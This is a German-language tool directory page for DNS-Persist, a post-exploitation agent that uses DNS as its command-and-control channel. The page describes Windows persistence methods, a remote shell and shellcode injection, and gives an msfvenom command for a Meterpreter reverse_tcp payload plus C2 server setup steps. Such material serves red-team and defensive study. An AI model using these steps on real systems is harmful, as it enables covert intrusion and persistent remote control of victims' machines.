Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
DNS-Persist — DNS-Persist ist ein Post-Exploitation-Agent, der DNS für Command and Control nutzt. | Kitploit
Tools/GitHubGitHub/0x09al/dns-persist
Payload-GenerierungPersistenzmechanismenShellcodePost-ExploitationPenetrationstestsCommand and ControlRed TeamingDNS-Analyse
GitHub0x09al/dns-persist

DNS-Persist

DNS-Persist ist ein Post-Exploitation-Agent, der DNS für Command and Control nutzt.

Repository anzeigen
20763vor 8 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

DNS-Persist

DNS-Persist ist ein Post-Exploitation-Agent, der DNS für Command and Control nutzt. Der serverseitige Code ist in Python geschrieben und der Agent ist in C++ kodiert. Dies ist die erste Version, weitere Funktionen und Verbesserungen werden in Zukunft folgen.

Erste Schritte

Autor

0x09AL - https://twitter.com/0x09al

Haftungsausschluss

VERWENDE DIESE SOFTWARE NICHT FÜR ILLEGALE ZWECKE.

DER AUTOR ÜBERNIMMT KEINERLEI VERANTWORTUNG FÜR JEGLICHEN MISSBRAUCH DES HIER BEREITGESTELLTEN CODES.

Habe ich das Rad neu erfunden?

Es gibt viele großartige Arbeiten zu DNS C2, aber ich habe diese Software erstellt, um mich mehr auf den Persistenz-Teil zu konzentrieren. Ich bin kein C++-Experte und dies ist mein erstes „richtiges Programm" in C++ (also erwarte einigen Code, bei dem man sich fremdschämen könnte).

Vorschläge für Funktionen und Verbesserungen sind willkommen.

Architektur

Es gibt zwei Hauptteile:

  1. DNS-Server
  2. Agent

alt text

Funktionen

Persistenzmechanismen

Diese Version hat nur 3 Persistenzmechanismen. Weitere werden später hinzugefügt.

  1. LogonScript-Persistenz.
  2. RunKey-Persistenz.
  3. Excel-Addin-Persistenz.

'Interaktive' Befehlsshell

Diese Version unterstützt eine pseudo-interaktive Befehlsshell, mit der du Systembefehle ausführen kannst.

Shellcode-Injektion

Diese Version unterstützt die Injektion von 32-Bit-Shellcode. Der Shellcode wird in einem neuen Thread im selben Prozess ausgeführt, daher wird ein abstürzender oder ungültiger Shellcode auch den Agenten zum Absturz bringen. Vermeide NULL-Bytes im Shellcode.

Beispiel für die Shellcode-Erzeugung

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port EXITFUNC=thread -b "\x00" -f hex -o /tmp/shellcode.hex

TODO-LISTE

  1. Verschlüsselung hinzufügen. Diese Version hat keinerlei Verschlüsselung, also gehst du bei der Verwendung eigene Risiken ein.
  2. Weitere Persistenzmechanismen hinzufügen.
  3. Agent in verschiedenen Programmiersprachen.

Installation & Verwendung

Serverseite

root@kitploit:~
pip install dnslib
git clone https://github.com/0x09AL/DNS-Persist
python server.py

Standardmäßig wird ein DNS-Server auf Port 53 gestartet. Das kannst du in der Datei server.py ändern.

Agent

Ich habe Visual Studio 2010 verwendet, um den Agenten zu programmieren, daher sollte das Importieren und Kompilieren recht einfach sein.

Denke daran, die Variable DOMAIN_NAME in Declarations.h zu ändern, damit sie zu deinem Domainnamen passt.

Die DNS-Nameserver der Domain sollten auf die IP-Adresse von DNS-Persist zeigen.

root@kitploit:~
#define DOMAIN_NAME "example.com"

Screenshots

  1. Picture-1

alt text

  1. Picture-2

alt text

  1. Picture-3

alt text

  1. Picture-4

alt text

Tool herunterladen